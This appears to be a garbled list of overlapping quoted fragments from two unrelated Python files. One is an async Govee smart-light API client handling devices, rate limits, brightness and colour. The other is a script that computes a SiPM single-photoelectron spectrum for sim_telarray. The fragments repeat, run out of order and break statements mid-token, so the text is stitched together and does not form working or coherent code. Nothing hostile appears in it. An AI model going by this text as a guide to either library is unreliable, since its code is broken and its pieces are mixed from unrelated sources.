device.device not in learning_infos: learning_infos[device.device]", "self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result},", "set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0", "model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in", "we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness", "= \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL", "0-255 \"\"\" success = False err = None device_str, device = self._get_device(device) if", "__aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self,", "device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led", "_utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self,", "with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value #", "in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) ->", "seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another", "Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r,", "time import math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime", "( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for", "= \"color\" 
command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err =", "prop_power_state = False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp =", "or blue > 255: err = f\"set_color: invalid value {color}, blue must be", "all HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\" err", "= brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await self._control(device,", "str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str,", "change self.events.online(self._online) if not online: # show all devices as offline for device", "return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\"", "disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str]", "> 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't", "not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break;", "if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until =", "in range 0-255 \"\"\" success = False err = None device_str, device =", "str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time()", "an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers", "online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as", "higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max", "\"\"\"Remaining calls that trigger rate limiting. 
Defaults to 5, which means there is", "\"\"\"Govee API client package.\"\"\" import asyncio import logging import time import math from", "as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -=", "= \"brightness\" result, err = await self._control(device, command, brightness_set) if err: # try", "\"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str controllable: bool", "device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"],", "isn't able to return state, return 'history' state self._devices[device_str].source = \"history\" result =", "limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call", "shown as off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached", "{self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to", "at which the current rate limit window resets in UTC epoch seconds. #", "to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max", "turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success", "command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device,", "\"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst", "Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success", "rate limit window resets in UTC epoch seconds. 
# return state from hisory", "lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device =", "0 or blue > 255: err = f\"set_color: invalid value {color}, blue must", "in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for", "up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result", "params = onOff result, err = await self._control(device, command, params) success = False", "1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str", "self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close()", "now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status", "start) * 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay =", "0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed", "== 100: _LOGGER.info( \"brightness range for %s is assumed. 
If the brightness slider", "\"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json )", "self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage", "= f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices return", "in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to", "manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self, api_key:", "None # disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff", "err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state(", "not send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS =", "device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\")", "Events from typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__", "self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is", "devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\"", "timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max:", "import 
VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL", "return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks", "\"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos: learning_info", "if it is a success result.\"\"\" return \"message\" in result and result[\"message\"] ==", "changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async", "handling all HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\"", "str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async", "= api_key self._devices = {} self._rate_limit_on = 5 # safe available call count", "brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1,", "config_offline_is_off from learning, or False by default. False: an offline device doesn't change", "None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await", "elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop:", "bool): \"\"\" Set global behavour when device is offline. 
None: default, use config_offline_is_off", "> 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\"", "{result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache", "error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc now as", "bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}:", "= True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET", "await self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage]", "err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by", "in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"],", "as off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices", "True: an offline device is shown as off. \"\"\" self._config_offline_is_off = val @property", "as ex: err = \"unknown error: %s\" % repr(ex) if err: class error_response:", "thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\"", "not online: # show all devices as offline for device in self.devices: device.online", "100: _LOGGER.info( \"brightness range for %s is assumed. 
If the brightness slider doesn't", ") -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device =", "= brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100", "bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int, int]", "returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device", "list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self,", "def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method", "seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return", "{device_str}: {cmd}\") result = None err = None if not device: err =", "response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color = (0,", "if color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp: invalid value", "self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device", "device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state", "0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off )", "offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception as", "device = self._get_device(device) return device @property def online(self): \"\"\"Last request was able to", "with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager 
async def _api_put(self,", "_LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING,", "self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return", "the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable:", "don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result", "= device.device if not device_str in self._devices: device = None # disallow unknown", "brightness_result_100 command = \"brightness\" result, err = await self._control(device, command, brightness_set) if err:" ]
[ "evaluate at spe_sigma : float Width of the single photoelectron peak opct :", "opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:, 0] sap", "import embed from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma,", "to optical crosstalk pct = ((1 - opct) * np.power(opct, N - 1)", "for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the", "= parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap =", "Can be used as an input to sim_telarray after normalisation with Konrads script", "float Probability of optical crosstalk pap : float Probability of afterpulse dap :", "from scipy.stats import norm from IPython import embed from matplotlib import pyplot as", ": ndarray X points to evaluate at spe_sigma : float Width of the", "= spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct *", "\"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ == '__main__':", "as np from scipy.special import binom from scipy.stats import norm from IPython import", "ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom from scipy.stats", "IPython import embed from matplotlib import pyplot as plt import os def sipm_enf(x,", "the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance", "sap = spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap = pct", "{} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x", "Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap)", "formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a", "x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if", "single 
photoelectron response for an SiPM. ' 'Can be used as an input", "dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap,", "after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir',", "used as an input to sim_telarray after ' 'normalisation with Konrads script') parser", ": float Distance of afterpulse peak from main peak \"\"\" n_peaks = 100", "the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1,", "\"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None]", "optical crosstalk pap : float Probability of afterpulse dap : float Distance of", "= {} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct,", "norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the", "with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import", "1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1", "np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired microcells", "the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value", "afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma", "{} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100,", "= pct * papk pap1 = pct * (1-papk) * papk pe_sigma =", "pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma **", "scipy.stats import norm from IPython import embed from matplotlib import pyplot as plt", "directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config", 
"= args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap", "ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K,", "= float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for", "input to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter)", "# Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap,", "= np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2)", "os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ ==", "\"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np", "opct = args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters:", "Distance of afterpulse peak from main peak \"\"\" n_peaks = 100 N =", "single photoelectron peak opct : float Probability of optical crosstalk pap : float", "- pap, N[:, 0]) p0ap = pct * papk pap1 = pct *", "dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path,", "spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path =", "* norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma)", "type=float, help='Value for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct',", "of the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir =", "of afterpulse dap : float Distance of afterpulse peak from main peak \"\"\"", "default=0, type=float, help='Value for the probability of afterpulses') 
parser.add_argument('--dap', dest='dap', action='store', default=0, type=float,", "np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1 = pct", "# Probability of n fired microcells due to optical crosstalk pct = ((1", "type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value", "matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap):", "float Width of the single photoelectron peak opct : float Probability of optical", "Formatter import numpy as np from scipy.special import binom from scipy.stats import norm", "= ('Obtain the single photoelectron response for an SiPM. ' 'Can be used", "for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation", "from matplotlib import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap,", "type=float, help='Value for the distance of the afterpulse peak ' 'from main peak')", "import norm from IPython import embed from matplotlib import pyplot as plt import", "{} opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap,", "> 1E-15 x = x[gt] y = y[gt] # Resample x = np.linspace(x.min(),", "import numpy as np from scipy.special import binom from scipy.stats import norm from", "= np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not", ": float Probability of optical crosstalk pap : float Probability of afterpulse dap", "Probability of afterpulse dap : float Distance of afterpulse peak from main peak", "as Formatter import numpy as np from scipy.special import binom from scipy.stats import", "opct = {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap)", "opct, pap, dap) gt = y > 1E-15 x = x[gt] y =", "dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000)", "Probability of n fired microcells due to optical crosstalk pct = ((1 -", "parser = 
argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the", "for a 100% probability of a single inital fired microcell Parameters ---------- x", "of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the", "(1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K", "1, 0))[:, 0] sap = spe_sigma papk = np.power(1 - pap, N[:, 0])", "points to evaluate at spe_sigma : float Width of the single photoelectron peak", "= args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma", "x : ndarray X points to evaluate at spe_sigma : float Width of", "0]) p0ap = pct * papk pap1 = pct * (1-papk) * papk", "= np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma)", "parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap',", "parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store',", "of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float,", "def main(): description = ('Obtain the single photoelectron response for an SiPM. 
'", "pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM", "args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct =", "print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created", "2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability of", "considers the case for a 100% probability of a single inital fired microcell", "type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value", "crosstalk pap : float Probability of afterpulse dap : float Distance of afterpulse", "files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the", "X points to evaluate at spe_sigma : float Width of the single photoelectron", ": float Probability of afterpulse dap : float Distance of afterpulse peak from", "input to sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse", "* norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain", "fired microcell Parameters ---------- x : ndarray X points to evaluate at spe_sigma", "p0ap = pct * papk pap1 = pct * (1-papk) * papk pe_sigma", "required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for", "dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float,", "pap : float Probability of afterpulse dap : float Distance of afterpulse peak", "deviation of the single ' 'photoelectron peak') 
parser.add_argument('--opct', dest='opct', action='store', default=0.1, type =", "for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of", "peak ' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma =", "pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) ) x =", "Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability", "* sap ** 2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal +=", "parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of the single", "sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This", "http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for a 100% probability of a", "papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma", "signal.sum(0) def main(): description = ('Obtain the single photoelectron response for an SiPM.", "photoelectron response for an SiPM. ' 'Can be used as an input to", "action='store', default=0, type=float, help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0,", "the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard deviation of", "the single photoelectron response for an SiPM. 
Can be used as an input", "crosstalk pct = ((1 - opct) * np.power(opct, N - 1) * binom(N", "be used as an input to sim_telarray after ' 'normalisation with Konrads script')", "help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the", "for the distance of the afterpulse peak ' 'from main peak') args =", "None] # Probability of n fired microcells due to optical crosstalk pct =", "\"\"\" SPE Parameters: spe_sigma = {} opct = {} pap = {} dap", "Probability of optical crosstalk pap : float Probability of afterpulse dap : float", "an input to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description,", "if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x,", "= {} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y", "not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y,", "output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap dap", "parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of the afterpulse peak", "os.makedirs(output_dir) output_path = os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path))", "' 'Can be used as an input to sim_telarray after ' 'normalisation with", "due to optical crosstalk pct = ((1 - opct) * np.power(opct, N -", "* binom(N - 1, 0))[:, 0] sap = spe_sigma papk = np.power(1 -", "SiPM. 
Can be used as an input to sim_telarray after normalisation with Konrads", "probability of a single inital fired microcell Parameters ---------- x : ndarray X", "photoelectron response for an SiPM. Can be used as an input to sim_telarray", "at spe_sigma : float Width of the single photoelectron peak opct : float", "'--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1,", "an SiPM. Can be used as an input to sim_telarray after normalisation with", "100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y >", "= np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1 =", "formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma',", "Parameters ---------- x : ndarray X points to evaluate at spe_sigma : float", "n_peaks = 100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] #", "of n fired microcells due to optical crosstalk pct = ((1 - opct)", "- 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk =", "gt = y > 1E-15 x = x[gt] y = y[gt] # Resample", "as an input to sim_telarray after normalisation with Konrads script \"\"\" import argparse", "0] sap = spe_sigma papk = np.power(1 - pap, N[:, 0]) p0ap =", "{} \"\"\".format(spe_sigma, opct, pap, dap) ) x = np.linspace(0, 100, 1000) y =", "Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory", "sim_telarray after normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter", "dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {}", "args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct = {} pap =", "import os def 
sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile", "= np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt =", "SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case for", "1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15", "distance of the afterpulse peak ' 'from main peak') args = parser.parse_args() output_dir", "x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt", "y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir))", "y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path,", "np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal", "pap, dap) ) x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct,", "\"\"\" Obtain the single photoelectron response for an SiPM. 
Can be used as", ": {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure :", "import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from", "' 'from main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma", "(1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron response", "pct * papk pap1 = pct * (1-papk) * papk pe_sigma = np.sqrt(K", "np.arange(1, n_peaks)[:, None] # Probability of n fired microcells due to optical crosstalk", "100 N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of", "signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K", "* papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma = np.sqrt(K *", "N - 1) * binom(N - 1, 0))[:, 0] sap = spe_sigma papk", "import pyplot as plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\"", "* (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single photoelectron", "pct * (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma", "pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers", "inital fired microcell Parameters ---------- x : ndarray X points to evaluate at", "for the standard deviation of the single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store',", "spe_sigma ** 2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K]", "pap, dap) gt = y > 1E-15 x = x[gt] y = y[gt]", "os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010", "crosstalk') 